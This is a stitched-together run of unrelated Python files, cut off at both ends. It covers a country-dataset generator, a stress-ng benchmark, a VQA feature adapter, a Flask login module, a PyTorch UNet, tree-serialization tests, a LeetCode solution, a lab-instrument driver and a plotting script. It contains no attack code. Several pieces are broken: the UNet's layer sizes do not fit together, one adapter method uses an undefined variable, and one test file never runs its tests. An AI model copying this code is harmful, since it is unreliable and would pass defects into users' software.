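# (ISO_CODE_KEY, name.official, NEIGHBORS_KEY, REGION_KEY, SUBREGION_KEY).
# The values below are examples only; the authoritative data comes from DATA_URL.
_EXAMPLE_COUNTRY_RECORD = {
    "cca3": "AUT",
    "name": {"official": "Republic of Austria"},
    "borders": ["CHE", "CZE", "DEU", "HUN", "ITA", "LIE", "SVK", "SVN"],
    "region": "Europe",
    "subregion": "Western Europe",
}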
""" # read the provided file with open(path, "r") as f: data = json.load(f) # create mapping from ISO codes to actual (readable) names names = {c[ISO_CODE_KEY]: c["name"]["official"] for c in data} # assemble a dictionary that maps from (ISO code) names to instances of country.Country return collections.OrderedDict( ( ( names[c[ISO_CODE_KEY]], country.Country( c[ISO_CODE_KEY], [names[n] for n in c[NEIGHBORS_KEY]], c[REGION_KEY], None if not c[SUBREGION_KEY] else c[SUBREGION_KEY] ) ) for c in data ) ) def _print_config(conf: config.Config) -> None: """Prints the provided configuration as table to the screen. Args: conf (:class:`config.Config`): The configuration to print. """ # parse and sort the config into (name, value) pairs str_conf = sorted(argmagic.get_config(conf).items(), key=lambda x: x[0]) # compute the maximum (string) lengths of all names and values, respectively max_name_len = max((len(n) for n, _ in str_conf)) max_value_len = max((len(v) for _, v in str_conf)) # assemble a horizontal separator h_line = "=" * (max_name_len + max_value_len + 3) # print the config to the screen print(h_line) print("CONFIGURATION") print(h_line) for name, value in str_conf: print(("{:" + str(max_name_len) + "} : {}").format(name, value)) print(h_line) print() def main(conf: config.Config): # create the output directory if it does not exist yet if not os.path.isdir(conf.output_dir): os.mkdir(conf.output_dir) # set up logging streamtologger.redirect( target=os.path.join(conf.output_dir, LOG_FILE_NAME), print_to_screen=not conf.quiet, header_format="[{timestamp:%Y-%m-%d %H:%M:%S} - {level:5}] ", append=False ) # print command that was used to run this application print("$", APP_NAME, " ".join(sys.argv[1:])) print() # print the provided configuration _print_config(conf) # seed RNG if possible if conf.seed is not None: print("seeding RNG with {}".format(conf.seed)) random.seed(conf.seed) print("OK\n") # look for data, and download it if necessary print("looking for data...") if conf.data is None: data_path = os.path.join(conf.output_dir, DATA_FILENAME) if os.path.isfile(data_path): print("discovered data at '{}'".format(data_path)) else: print("downloading data to '{}'...".format(data_path)) urllib.request.urlretrieve(DATA_URL, data_path) conf.data = data_path print("OK\n") # load the data from disk print("loading data from '{}'...".format(conf.data)) data = _load_data(conf.data) print("found data about {} countries".format(len(data))) print("OK\n") # invoke dataset generator to create the required datasets print( "generating {} dataset{} with {} training sample{}\n".format( conf.num_datasets, "s" if conf.num_datasets > 1 else "", conf.num_training_samples, "s" if conf.num_training_samples > 1 else "" ) ) generator = data_gen.DatasetGenerator( data, conf.setting, dlv_solver.DlvSolver(conf.dlv), ONTOLOGY, conf.class_facts ) generator.generate_datasets(conf.num_datasets, conf.num_training_samples, conf.output_dir) main(argmagic.parse_args(config.Config, app_name=APP_NAME, app_description=APP_DESCRIPTION)) # Copyright 2019 PerfKitBenchmarker Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. """Runs stress-ng. From the stress-ng ubuntu documentation: stress-ng will stress test a computer system in various selectable ways. It was designed to exercise various physical subsystems of a computer as well as the various operating system kernel interfaces. stress-ng also has a wide range of CPU specific stress tests that exercise floating point, integer, bit manipulation and control flow. stress-ng manpage: http://manpages.ubuntu.com/manpages/xenial/man1/stress-ng.1.html """ import logging import numpy from perfkitbenchmarker import configs from perfkitbenchmarker import flags from perfkitbenchmarker import sample FLAGS = flags.FLAGS BENCHMARK_NAME = 'stress_ng' BENCHMARK_CONFIG = """ stress_ng: description: Runs stress-ng vm_groups: default: vm_spec: *default_single_core disk_spec: *default_50_gb """ flags.DEFINE_integer('stress_ng_duration', 10, 'Number of seconds to run the test.') flags.DEFINE_boolean('stress_ng_calc_geomean', True, 'Whether to calculate geomean or not.') flags.DEFINE_list('stress_ng_custom_stressors', [], 'List of stressors to run against. Default combines cpu,' 'cpu-cache, and memory suites') def _GeoMeanOverflow(iterable): """Returns the geometric mean. See https://en.wikipedia.org/wiki/Geometric_mean#Relationship_with_logarithms Args: iterable: a list of positive floats to take the geometric mean of. Returns: The geometric mean of the list. """ a = numpy.log(iterable) return numpy.exp(a.sum() / len(a)) def StressngCustomStressorsValidator(stressors): """Returns whether or not the list of custom stressors is valid.""" valid_stressors = { 'affinity', 'af-alg', 'aio', 'aio-linux', 'apparmor', 'bigheap', 'brk', 'bsearch', 'cache', 'chdir', 'chmod', 'clock', 'clone', 'context', 'cpu', 'cpu-online', 'crypt', 'daemon', 'dentry', 'dir', 'dup', 'epoll', 'eventfd', 'exec', 'fallocate', 'fault', 'fcntl', 'fiemap', 'fifo', 'filename', 'flock', 'fork', 'fp-error', 'fstat', 'futex', 'get', 'getrandom', 'getdent', 'handle', 'hdd', 'heapsort', 'hsearch', 'icache', 'iosync', 'inotify', 'itimer', 'kcmp', 'key', 'kill', 'klog', 'lease', 'link', 'lockbus', 'lockf', 'longjmp', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'memfd', 'mergesort', 'mincore', 'mknod', 'mlock', 'mmap', 'mmapfork', 'mmapmany', 'mremap', 'msg', 'mq', 'nice', 'null', 'numa', 'oom-pipe', 'open', 'personality', 'pipe', 'poll', 'procfs', 'pthread', 'ptrace', 'qsort', 'quota', 'rdrand', 'readahead', 'remap-file-pages', 'rename', 'rlimit', 'seccomp', 'seek', 'sem-posix', 'sem-sysv', 'shm-posix', 'shm-sysv', 'sendfile', 'sigfd', 'sigfpe', 'sigpending', 'sigq', 'sigsegv', 'sigsuspend', 'sleep', 'socket', 'socket-fd', 'socket-pair', 'spawn', 'splice', 'stack', 'str', 'stream', 'switch', 'symlink', 'sync-file', 'sysinfo', 'sysfs', 'tee', 'timer', 'timerfd', 'tsc', 'tsearch', 'udp', 'udp-flood', 'unshare', 'urandom', 'userfaultfd', 'utime', 'vecmath', 'vfork', 'vm', 'vm-rw', 'vm-splice', 'wait', 'wcs', 'xattr', 'yield', 'zero', 'zlib', 'zombie' } return valid_stressors.issuperset(set(stressors)) def GetConfig(user_config): return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME) def Prepare(benchmark_spec): """Installs stress-ng on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. 
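# Reader aid: a quick standalone check that the log/exp formulation in
# _GeoMeanOverflow matches the naive product-based geometric mean on small
# inputs (the log form simply avoids overflowing the intermediate product for
# long lists of large bogo-ops values).
import numpy

_values = [4485.82, 2249.65, 123.4]
_naive = numpy.prod(_values) ** (1.0 / len(_values))
_stable = numpy.exp(numpy.log(_values).sum() / len(_values))
assert numpy.isclose(_naive, _stable)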
""" vm = benchmark_spec.vms[0] vm.InstallPackages('stress-ng') def _ParseStressngResult(metadata, output): """Returns stress-ng data as a sample. Sample output eg: stress-ng: info: [2566] dispatching hogs: 2 context stress-ng: info: [2566] successful run completed in 5.00s stress-ng: info: [2566] stressor bogo ops real time usr time sys time bogo ops/s bogo ops/s stress-ng: info: [2566] (secs) (secs) (secs) (real time) (usr+sys time) stress-ng: info: [2566] context 22429 5.00 5.49 4.48 4485.82 2249.65 Args: metadata: metadata of the sample. output: the output of the stress-ng benchmark. """ output_list = output.splitlines() output_matrix = [i.split() for i in output_list] if len(output_matrix) != 5: logging.error('output is missing') return '' assert output_matrix[2][-4] == 'bogo' and output_matrix[2][-3] == 'ops/s' assert output_matrix[3][-4] == '(real' and output_matrix[3][-3] == 'time)' line = output_matrix[4] name = line[3] value = float(line[-2]) # parse bogo ops/s (real time) return sample.Sample( metric=name, value=value, unit='bogus_ops_sec', # bogus operations per second metadata=metadata) def Run(benchmark_spec): """Runs stress-ng on the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. Returns: A list of sample.Sample objects. """ vm = benchmark_spec.vms[0] metadata = { 'duration_sec': FLAGS.stress_ng_duration, 'threads': vm.NumCpusForBenchmark() } # Rather than running stress-ng with --class cpu,cpu-cache,memory all in one # RobustRemoteCommand we run each stressor indivually. The reason is that # RobustRemoteCommand periodically SSHs into the VM, but one of the memory # stressors stresses the VM so much that SSH instantly returns 255, causing # the benchmark to fail completely. 
cpu_suites = [ 'af-alg', 'bsearch', 'context', 'cpu', 'cpu-online', 'crypt', 'fp-error', 'getrandom', 'heapsort', 'hsearch', 'longjmp', 'lsearch', 'matrix', 'mergesort', 'numa', 'qsort', 'rdrand', 'str', 'stream', 'tsc', 'tsearch', 'vecmath', 'wcs', 'zlib' ] cpu_cache_suites = [ 'bsearch', 'cache', 'heapsort', 'hsearch', 'icache', 'lockbus', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'mergesort', 'qsort', 'str', 'stream', 'tsearch', 'vecmath', 'wcs', 'zlib' ] memory_suites = [ 'bsearch', 'context', 'heapsort', 'hsearch', 'lockbus', 'lsearch', 'malloc', 'matrix', 'membarrier', 'memcpy', 'memfd', 'mergesort', 'mincore', 'null', 'numa', 'oom-pipe', 'pipe', 'qsort', 'stack', 'str', 'stream', 'tsearch', 'vm', 'vm-rw', 'wcs', 'zero', 'zlib' ] stressors = sorted(set(cpu_suites + cpu_cache_suites + memory_suites)) if FLAGS.stress_ng_custom_stressors: stressors = FLAGS.stress_ng_custom_stressors samples = [] values_to_geomean_list = [] for stressor in stressors: cmd = ('stress-ng --{stressor} {numthreads} --metrics-brief ' '-t {duration}'.format(stressor=stressor, numthreads=vm.NumCpusForBenchmark(), duration=FLAGS.stress_ng_duration)) stdout, _ = vm.RemoteCommand(cmd) stressng_sample = _ParseStressngResult(metadata, stdout) if stressng_sample: samples.append(stressng_sample) values_to_geomean_list.append(stressng_sample.value) # Only calculate geomean if each stressors provided a value if FLAGS.stress_ng_calc_geomean and len(values_to_geomean_list) == len( stressors): geomean_metadata = metadata.copy() geomean_metadata['stressors'] = stressors geomean_sample = sample.Sample( metric='STRESS_NG_GEOMEAN', value=_GeoMeanOverflow(values_to_geomean_list), unit='bogus_ops_sec', metadata=geomean_metadata) samples.append(geomean_sample) return samples def Cleanup(benchmark_spec): """Cleans up stress-ng from the target vm. Args: benchmark_spec: The benchmark specification. Contains all data that is required to run the benchmark. """ vm = benchmark_spec.vms[0] vm.Uninstall('stress-ng') kyungjunlee/openvqa # -------------------------------------------------------- # OpenVQA # Written by https://github.com/ParadoxZW # -------------------------------------------------------- import torch.nn as nn import torch from openvqa.core.base_dataset import BaseAdapter from openvqa.utils.make_mask import make_mask class Adapter(BaseAdapter): def __init__(self, __C): super(Adapter, self).__init__(__C) self.__C = __C def relation_embedding(self, f_g): x_min, y_min, x_max, y_max = torch.chunk(f_g, 4, dim=2) # [bs, n_obj, 1] cx = (x_min + x_max) * 0.5 # [bs, n_obj, 1] cy = (y_min + y_max) * 0.5 # [bs, n_obj, 1] w = (x_max - x_min) + 1. # [bs, n_obj, 1] h = (y_max - y_min) + 1. 
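# Reader aid: a standalone restatement of the geometry math in
# relation_embedding, showing the shape flow. Given boxes of shape
# [bs, n_obj, 4] as (x_min, y_min, x_max, y_max), the result is a
# [bs, n_obj, n_obj, 4] pairwise matrix of log-ratio position features.
# The function name is illustrative; it is not part of OpenVQA.
import torch


def pairwise_box_geometry(boxes: torch.Tensor) -> torch.Tensor:
    x_min, y_min, x_max, y_max = torch.chunk(boxes, 4, dim=2)   # each [bs, n, 1]
    cx, cy = (x_min + x_max) * 0.5, (y_min + y_max) * 0.5
    w, h = (x_max - x_min) + 1.0, (y_max - y_min) + 1.0
    # broadcasting [bs, n, 1] against [bs, 1, n] yields [bs, n, n]
    dx = torch.log(torch.clamp(torch.abs((cx - cx.transpose(-1, -2)) / w), min=1e-3))
    dy = torch.log(torch.clamp(torch.abs((cy - cy.transpose(-1, -2)) / h), min=1e-3))
    dw = torch.log(w / w.transpose(-1, -2))
    dh = torch.log(h / h.transpose(-1, -2))
    return torch.stack((dx, dy, dw, dh), dim=-1)                # [bs, n, n, 4]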
# [bs, n_obj, 1] delta_x = cx - cx.transpose(-1, -2) delta_x = torch.clamp(torch.abs(delta_x / w), min=1e-3) delta_x = torch.log(delta_x) # [bs, n_obj, n_obj] delta_y = cy - cy.transpose(-1, -2) delta_y = torch.clamp(torch.abs(delta_y / h), min=1e-3) delta_y = torch.log(delta_y) # [bs, n_obj, n_obj] delta_w = torch.log(w / w.transpose(-1, -2)) # [bs, n_obj, n_obj] delta_h = torch.log(h / h.transpose(-1, -2)) # [bs, n_obj, n_obj] size = delta_h.size() delta_x = delta_x.view(size[0], size[1], size[2], 1) delta_y = delta_y.view(size[0], size[1], size[2], 1) delta_w = delta_w.view(size[0], size[1], size[2], 1) delta_h = delta_h.view(size[0], size[1], size[2], 1) # [bs, n_obj, n_obj, 1] position_mat = torch.cat( (delta_x, delta_y, delta_w, delta_h), -1) # [bs, n_obj, n_obj, 4] return position_mat def vqa_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['vqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, __C.HIDDEN_SIZE) def vizwiz_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['vqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, __C.HIDDEN_SIZE) def gqa_init(self, __C): imgfeat_linear_size = __C.FEAT_SIZE['gqa']['FRCN_FEAT_SIZE'][1] if __C.USE_BBOX_FEAT: self.bbox_linear = nn.Linear(5, __C.BBOXFEAT_EMB_SIZE) imgfeat_linear_size += __C.BBOXFEAT_EMB_SIZE self.frcn_linear = nn.Linear(imgfeat_linear_size, __C.HIDDEN_SIZE) if __C.USE_AUX_FEAT: self.grid_linear = nn.Linear(__C.FEAT_SIZE['gqa']['GRID_FEAT_SIZE'][1], __C.HIDDEN_SIZE) def clevr_init(self, __C): self.grid_linear = nn.Linear(__C.FEAT_SIZE['clevr']['GRID_FEAT_SIZE'][1], __C.HIDDEN_SIZE) def vqa_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_proc(bbox_feat) bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def vizwiz_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_proc(bbox_feat) bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def gqa_forward(self, feat_dict): frcn_feat = feat_dict['FRCN_FEAT'] bbox_feat = feat_dict['BBOX_FEAT'] grid_feat = feat_dict['GRID_FEAT'] img_feat_mask = make_mask(frcn_feat) if self.__C.USE_BBOX_FEAT: bbox_feat = self.bbox_linear(bbox_feat) frcn_feat = torch.cat((frcn_feat, bbox_feat), dim=-1) img_feat = self.frcn_linear(frcn_feat) if self.__C.USE_AUX_FEAT: grid_feat_mask = make_mask(grid_feat) img_feat_mask = torch.cat((img_feat_mask, grid_feat_mask), dim=-1) grid_feat = self.grid_linear(grid_feat) img_feat = torch.cat((img_feat, grid_feat), dim=1) rel_embed = self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask def clevr_forward(self, feat_dict): grid_feat = feat_dict['GRID_FEAT'] img_feat_mask = make_mask(grid_feat) img_feat = self.grid_linear(grid_feat) rel_embed = 
self.relation_embedding(bbox_feat) return img_feat, rel_embed, img_feat_mask koneksys/aras-oslcoslc_api/auth/__init__.py import logging from flask import make_response, request, g from flask_login import LoginManager, user_loaded_from_request, user_loaded_from_header from oslc_api.auth.client import ArasAPI from oslc_api.rest_api.custom_session import CustomSessionInterface logger = logging.getLogger(__name__) aras_api = ArasAPI() login = LoginManager() @login.request_loader def load_user_from_request(request): logger.debug('Looking for X-ARAS-ACCESS-TOKEN header') user = None access_token = request.headers.get('X-ARAS-ACCESS-TOKEN') if access_token: if aras_api.user and aras_api.user.access_token == access_token: user = aras_api.user logger.debug(f'X-ARAS-ACCESS-TOKEN: {user}') return user @user_loaded_from_request.connect def user_loaded_from_request(self, user=None): logger.debug(f'login_via_header: {True}') g.login_via_header = True @user_loaded_from_header.connect def user_loaded_from_header(self, user=None): logger.debug(f'login_via_header: {True}') g.login_via_header = True @login.unauthorized_handler def unauthorized(): data = { 'message': 'The resource is protected, you should authenticate to be able to access it' } logger.debug(f'Unauthenticated user : {data}') resp = make_response(data, 401) return resp def init_app(app): client_id = app.config['OAUTH_CLIENT_ID'] aras_base_api_uri = app.config['SOURCE_BASE_API_URI'] aras_database = app.config['SOURCE_DATABASE'] logger.debug("Initializing OAuth for: {}".format(client_id)) login.init_app(app) aras_api.init_app(app, aras_base_api_uri, 'Innovator', client_id, aras_database) app.session_interface = CustomSessionInterface() """ ================================== || , 2020 || || github: orsveri || ================================== This is the implementation of UNet models. 
Based on: [github.com/petrosgk/Kaggle-Carvana-Image-Masking-Challenge], which was based on this PyTorch implementation: [https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37208] TODO: now only model for input shape of 1024 implemented; check and add other options """ import torch from torch import nn class BlockDownsampling(nn.Module): def __init__(self, input_channels, output_channels, end_with_pooling=True): super(BlockDownsampling, self).__init__() self.end_with_pooling = end_with_pooling self.conv1 = nn.Conv2d(in_channels=input_channels, out_channels=output_channels, kernel_size=(3, 3), stride=1, padding=1, bias=True, padding_mode='zeros') self.bn1 = nn.BatchNorm2d(num_features=output_channels) self.relu = nn.ReLU() self.conv2 = nn.Conv2d(in_channels=output_channels, out_channels=output_channels, kernel_size=(3, 3), stride=1, padding=1, bias=True, padding_mode='zeros') self.bn2 = nn.BatchNorm2d(num_features=output_channels) if end_with_pooling: self.pool = nn.MaxPool2d(kernel_size=(2, 2), stride=2) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x_link = self.relu(x) if self.end_with_pooling: x = self.pool(x_link) return x, x_link else: return x_link class BlockUpsampling(nn.Module): def __init__(self, input_channels, output_channels): super(BlockUpsampling, self).__init__() self.up1 = nn.Upsample(size=(2, 2)) self.conv1 = nn.Conv2d(in_channels=input_channels*2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn1 = nn.BatchNorm2d(num_features=output_channels) self.relu = nn.ReLU() self.conv2 = nn.Conv2d(in_channels=input_channels * 2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn2 = nn.BatchNorm2d(num_features=output_channels) self.conv3 = nn.Conv2d(in_channels=input_channels * 2, out_channels=output_channels, kernel_size=(3, 3), stride=1) self.bn3 = nn.BatchNorm2d(num_features=output_channels) def forward(self, x, x_link): x = self.up1(x) x = torch.cat((x_link, x), dim=1) # concatenate along channels dimension x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x = self.relu(x) x = self.conv2(x) x = self.bn2(x) x = self.relu(x) return x class UNet(nn.Module): def __init__(self, nb_classes, input_shape): super(UNet, self).__init__() self.down1 = BlockDownsampling(input_channels=3, output_channels=8, end_with_pooling=True) self.down2 = BlockDownsampling(input_channels=8, output_channels=16, end_with_pooling=True) self.down3 = BlockDownsampling(input_channels=16, output_channels=32, end_with_pooling=True) self.down4 = BlockDownsampling(input_channels=32, output_channels=64, end_with_pooling=True) self.down5 = BlockDownsampling(input_channels=64, output_channels=128, end_with_pooling=True) self.down6 = BlockDownsampling(input_channels=126, output_channels=256, end_with_pooling=True) self.down7 = BlockDownsampling(input_channels=256, output_channels=512, end_with_pooling=True) self.center = BlockDownsampling(input_channels=512, output_channels=1024, end_with_pooling=False) self.up7 = BlockUpsampling(input_channels=1024, output_channels=512) self.up6 = BlockUpsampling(input_channels=512, output_channels=256) self.up5 = BlockUpsampling(input_channels=256, output_channels=128) self.up4 = BlockUpsampling(input_channels=128, output_channels=64) self.up3 = BlockUpsampling(input_channels=64, output_channels=32) self.up2 = BlockUpsampling(input_channels=32, output_channels=16) self.up1 = BlockUpsampling(input_channels=16, output_channels=8) 
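# Reader aid, not part of the original file: as written above, BlockUpsampling
# pins its output to 2x2 via nn.Upsample(size=(2, 2)), uses unpadded 3x3 convs
# whose in_channels do not match after the first layer, reuses conv2/bn2 in
# forward() instead of conv3/bn3, and down6 is given 126 input channels where
# down5 emits 128. A corrected sketch of the upsampling block, assuming the
# intent of the referenced Keras Carvana UNet (double the resolution, 'same'
# padding, three conv+BN+ReLU after concatenation):
import torch
from torch import nn


class BlockUpsamplingFixed(nn.Module):
    def __init__(self, input_channels, skip_channels, output_channels):
        super().__init__()
        self.up = nn.Upsample(scale_factor=2)  # double H and W
        # after concatenation the channel count is input_channels + skip_channels
        self.conv1 = nn.Conv2d(input_channels + skip_channels, output_channels,
                               kernel_size=3, stride=1, padding=1)
        self.bn1 = nn.BatchNorm2d(output_channels)
        self.conv2 = nn.Conv2d(output_channels, output_channels, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(output_channels)
        self.conv3 = nn.Conv2d(output_channels, output_channels, 3, padding=1)
        self.bn3 = nn.BatchNorm2d(output_channels)
        self.relu = nn.ReLU()

    def forward(self, x, x_link):
        x = self.up(x)
        x = torch.cat((x_link, x), dim=1)  # concatenate along channels
        x = self.relu(self.bn1(self.conv1(x)))
        x = self.relu(self.bn2(self.conv2(x)))
        x = self.relu(self.bn3(self.conv3(x)))
        return x
# In this network each skip connection carries output_channels channels, so the
# original two-argument constructor would map to
# BlockUpsamplingFixed(input_channels, output_channels, output_channels).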
self.final_conv = nn.Conv2d(in_channels=8, out_channels=nb_classes, kernel_size=(1, 1), stride=1) if nb_classes == 1: self.final_activation = nn.Sigmoid() else: self.final_activation = nn.Softmax() def forward(self, x): x, x1_link = self.down1(x) x, x2_link = self.down2(x) x, x3_link = self.down3(x) x, x4_link = self.down4(x) x, x5_link = self.down5(x) x, x6_link = self.down6(x) x, x7_link = self.down7(x) x = self.center(x) x = self.up7(x=x, x_link=x7_link) x = self.up6(x=x, x_link=x6_link) x = self.up5(x=x, x_link=x5_link) x = self.up4(x=x, x_link=x4_link) x = self.up3(x=x, x_link=x3_link) x = self.up2(x=x, x_link=x2_link) x = self.up1(x=x, x_link=x1_link) x = self.final_conv(x) x = self.final_activation(x) return x class Node: def __init__(self, val): self.val = val self.left = None self.right = None def serialize(root): nodes = [] curr_q = [root] next_level = True if root else False while next_level and curr_q: next_q = [] next_level = False for node in curr_q: if node: nodes.append(str(node.val)) if node.left or node.right: next_level = True next_q.append(node.left) next_q.append(node.right) else: nodes.append(str(node)) curr_q = next_q next_q = [] return ','.join(nodes) def deserialize(tree): if not tree: return None nodes = [None if n == 'None' else int(n) for n in tree.split(',')] root = Node(nodes.pop(0)) curr_q = [root] while nodes and curr_q: parent = curr_q.pop(0) left_node = nodes.pop(0) if left_node != None: parent.left = Node(left_node) curr_q.append(parent.left) right_node = nodes.pop(0) if right_node != None: parent.right = Node(right_node) curr_q.append(parent.right) return root def display_tree(root): if not root: return level = 0 curr_q = [root] print_line = True while print_line and curr_q: print_line = False next_q = [] level += 1 print('Level:', level) for node in curr_q: if node == None: print('None', end=',') else: print(node.val, end=',') next_q.append(node.left) next_q.append(node.right) if node.left or node.right: print_line = True print('') curr_q = next_q # test 1 print('Test 1') root = Node(1) root.left = Node(2) root.right = Node(3) root.right.left = Node(4) root.right.right = Node(5) serialized_tree = serialize(root) assert serialized_tree == '1,2,3,None,None,4,5' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 2 print('Test 2') root = Node(1) serialized_tree = serialize(root) assert serialized_tree == '1' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 3 print('Test 3') root = None serialized_tree = serialize(root) assert serialized_tree == '' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # test 4 print('Test 4') root = Node(1) root.left = Node(2) root.right = Node(3) root.left.left = Node(4) root.left.right = Node(5) serialized_tree = serialize(root) assert serialized_tree == '1,2,3,4,5,None,None' deserialized_tree = deserialize(serialized_tree) display_tree(deserialized_tree) print('') # 670. 
Maximum Swap # https://leetcode.com/problems/maximum-swap import unittest class Solution(object): def maximumSwap(self, num): """ :type num: int :rtype: int """ arr = list(str(num)) size = len(arr) if size == 1: return num for i in range(size): for j in range(i + 1, size): self.swap(arr, i, j) val = int(''.join(arr)) if val > num: num = val self.swap(arr, i, j) return num def swap(self, arr, i, j): arr[i], arr[j] = arr[j], arr[i] class TestMaximumSwap(unittest.TestCase): def test(self): sol = Solution() self.assertEqual( sol.maximumSwap(2736), 7236 ) self.assertEqual( sol.maximumSwap(1), 1 ) self.assertEqual( sol.maximumSwap(10), 10 ) if __name__ == '__main__': unittest.TestCase() """ Qudev specific driver for the UHFQA instrument. """ import logging import time import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.UHFQA_core as uhf log = logging.getLogger(__name__) class UHFQA_qudev(uhf.UHFQA_core): """This is the Qudev specific PycQED driver for the 1.8 GSa/s UHFQA instrument from Zurich Instruments AG. """ USER_REG_FIRST_SEGMENT = 5 USER_REG_LAST_SEGMENT = 6 def __init__(self, name, device: str, interface: str = 'USB', address: str = '127.0.0.1', port: int = 8004, nr_integration_channels: int = 10, server: str = '', **kw) -> None: """ Input arguments: name: (str) name of the instrument device (str) the name of the device e.g., "dev8008" interface (str) the name of the interface to use ('1GbE' or 'USB') address (str) the host where the ziDataServer is running (for compatibility) port (int) the port to connect to for the ziDataServer (don't change) nr_integration_channels (int) the number of integration channels to use (max 10) server: (str) the host where the ziDataServer is running (if not '' then used instead of address) """ t0 = time.time() super().__init__(name=name, device=device, interface=interface, address=address, server=server, port=port, nr_integration_channels=nr_integration_channels, **kw) t1 = time.time() log.info(f'{self.devname}: Initialized UHFQA_qudev in {t1 - t0:.3f}s') def acquisition_initialize(self, samples, averages, loop_cnt, channels=(0, 1), mode='rl') -> None: # Define the channels to use and subscribe to them self._acquisition_nodes = [] if mode == 'rl': for c in channels: path = self._get_full_path('qas/0/result/data/{}/wave'.format(c)) self._acquisition_nodes.append(path) self.subs(path) # Enable automatic readout self.qas_0_result_reset(1) self.qas_0_result_enable(0) self.qas_0_result_length(samples) self.qas_0_result_averages(averages) ro_mode = 0 else: for c in channels: path = self._get_full_path('qas/0/monitor/inputs/{}/wave'.format(c)) self._acquisition_nodes.append(path) self.subs(path) # Enable automatic readout self.qas_0_monitor_reset(1) self.qas_0_monitor_enable(1) self.qas_0_monitor_length(samples) self.qas_0_monitor_averages(averages) ro_mode = 1 self.set('awgs_0_userregs_{}'.format(uhf.UHFQA_core.USER_REG_LOOP_CNT), loop_cnt) self.set('awgs_0_userregs_{}'.format(uhf.UHFQA_core.USER_REG_RO_MODE), ro_mode) from __future__ import print_function, division import sys import re import numpy as np import matplotlib.pyplot as plt def is_eff(stdout_file): """ IS Speedup R / I / Total: 1239.74 (30 of 37465) / 40.43 (8 of 338) / 48094.08 (263 of 12663170)""" pattern = ' IS Speedup R / I / Total:' compiled_pattern = re.compile(pattern) grid_r = [] grid_i = [] grid_total = [] is_r = [] is_i = [] is_total = [] speedup_r = [] speedup_i = [] speedup_total = [] with open(stdout_file) as stdout_file: for line in stdout_file: splited_line = 
compiled_pattern.split(line) if len(splited_line) >= 2: speedup = splited_line[1].rstrip() speedup = speedup.replace('(', ' ').replace(')', ' ') speed_data = speedup.split() # print(speed_data) speedup_r.append(float(speed_data[0])) is_r.append(float(speed_data[1])) grid_r.append(float(speed_data[3])) speedup_i.append(float(speed_data[5])) is_i.append(float(speed_data[6])) grid_i.append(float(speed_data[8])) speedup_total.append(float(speed_data[10])) is_total.append(float(speed_data[11])) grid_total.append(float(speed_data[13])) iteration = np.arange(len(speedup_r)) fig, ax = plt.subplots(nrows=3, sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_r, label='grid by importance sampling') ax[0].plot(iteration, grid_r, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_r, label='importance sampling') ax[2].plot(iteration, speedup_r, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling with $(\phi, \theta)$ (dir on sphere)') fig, ax = plt.subplots(nrows=3, sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_i, label='grid by importance sampling') ax[0].plot(iteration, grid_i, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_i, label='importance sampling') ax[2].plot(iteration, speedup_i, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling with $(\psi)$ (inplane-rotation)') fig, ax = plt.subplots(nrows=3, 